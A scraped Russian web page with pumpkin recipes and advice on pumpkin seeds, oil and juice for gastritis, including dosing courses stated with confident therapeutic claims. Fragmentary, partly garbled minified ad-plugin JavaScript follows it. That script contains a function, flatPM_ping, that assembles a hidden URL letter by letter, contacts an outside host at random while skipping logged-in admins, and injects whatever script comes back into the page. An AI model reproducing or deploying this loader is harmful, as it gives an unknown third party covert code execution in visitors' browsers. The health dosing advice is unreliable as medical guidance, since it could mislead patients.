Ингредиенты: Тыква – 200 гр.; овсяная крупа – 50 гр.; нежирное молоко – 400 гр.; вода – 200 гр.; соль.

Как приготовить:

  • Тыкву нарезать мелкими кубиками, сложить в кастрюлю с толстым дном, залить водой и тушить на медленном огне до тех пор, пока вся вода не выпарится.
  • К тыкве добавить овсянку, залить все молоком и добавить щепотку соли.
  • Варить на медленном огне до готовности – примерно полчаса.
  • К готовому блюду можно добавить немного сливочного масла, мед или сладкие фрукты.

С рисом

Ингредиенты: 300 гр. тыквы; 6 ст. ложек круглозерного риса; вода; соль.

Как приготовить:

  • Рис предварительно замочить в холодной воде на 3-4 часа (лучше на ночь).
  • Тыкву нарезать небольшими кубиками, положить в толстостенную посуду и долить воды так, чтобы мякоть была полностью закрыта.
  • Добавить рис, посолить и тушить блюдо на медленном огне до готовности – 15-20 мин.
  • Дать каше немного остыть, затем взбить блендером.
  • В готовое блюдо можно добавить пару ложек нежирного молока, мед или разрешенные сухофрукты.

Тыквенные семечки

Человеку, не имеющему проблем с желудком, тыквенные семечки пойдут только на пользу. Они избавляют от запоров, снижают уровень сахара и холестерина, помогают выведению продуктов распада. Семечки содержат белки, полезные жирные кислоты и витамины группы В.

Однако больные гастритом должны остерегаться этого продукта. При попадании в желудок твердые сырые семечки (и сушеные тоже) травмируют воспаленную слизистую желудка и активизируют его секрецию.

Жареные семечки, которые можно встретить на прилавках магазинов, вообще нельзя рассматривать как продукт питания для людей с больным желудком из-за обилия масла, соли и специй.

Тыквенное масло

Тыквенное масло (выжимка из семян тыквы) – уникальный целебный продукт, которые рекомендуется принимать не только при гастрите, но и при других заболеваниях желудочно-кишечного тракта. При выборе масла в магазине или аптеке обратите внимание на то, каким способом оно было отжато. Наиболее полезное – масло холодного отжима.

Как и все масла, тыквенное обладает обволакивающим свойством и защищает нежную слизистую от раздражающей пищи и воздействия соляной кислоты, содержащейся в желудочном секрете. Полезные компоненты масла (витамины, микроэлементы, ненасыщенные жирные кислоты) способствуют снятию воспаления и быстрой регенерации слизистой.

Тыквенное масло при гастрите рекомендуется принимать по классической схеме: по 1 ч. ложке 2 раза в день за полчаса до еды. Курс приема – 2-3 месяца.

Противопоказанием к применению является индивидуальная непереносимость, желчнокаменная болезнь, детский возраст до 12 лет.

Можно ли пить тыквенный сок?

Как и тыквенные блюда, сок можно употреблять только страдающим от гастрита с повышенной кислотностью. Напиток подавляет выделение соляной кислоты, купирует болевой синдром, а также стимулирует выработку желчи.

Рекомендуется пить только свежевыжатый сок, хранить его в холодильнике нежелательно. Напиток следует развести водой комнатной температуры в соотношении 1:1. После употребления сока нужно прополоскать рот водой во избежание потемнения зубной эмали.

Сок принимают за 15 мин. до еды 3 раза в день на протяжении 2-ух недель. Затем делают двухнедельный перерыв и повторяют курс снова.

Сокотерапия может быть очень эффективна, если во время нее больной придерживается специальной диеты и соблюдает врачебные рекомендации.

Советы и рекомендации

Как и любое заболевание, гастрит легче предупредить, чем лечить. Люди, ведущие здоровый образ жизни, как правило, не испытывают проблем с желудком.

Рациональное питание, регулярная физнагрузка, отказ от алкоголя и курения станут лучшей профилактикой большинства известных болезней, в том числе гастрита и язвы.

Следует помнить, что прием некоторых лекарственных препаратов может запросто спровоцировать острый гастрит, поэтому внимательно прислушивайтесь к своему организму и не занимайтесь самолечением.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};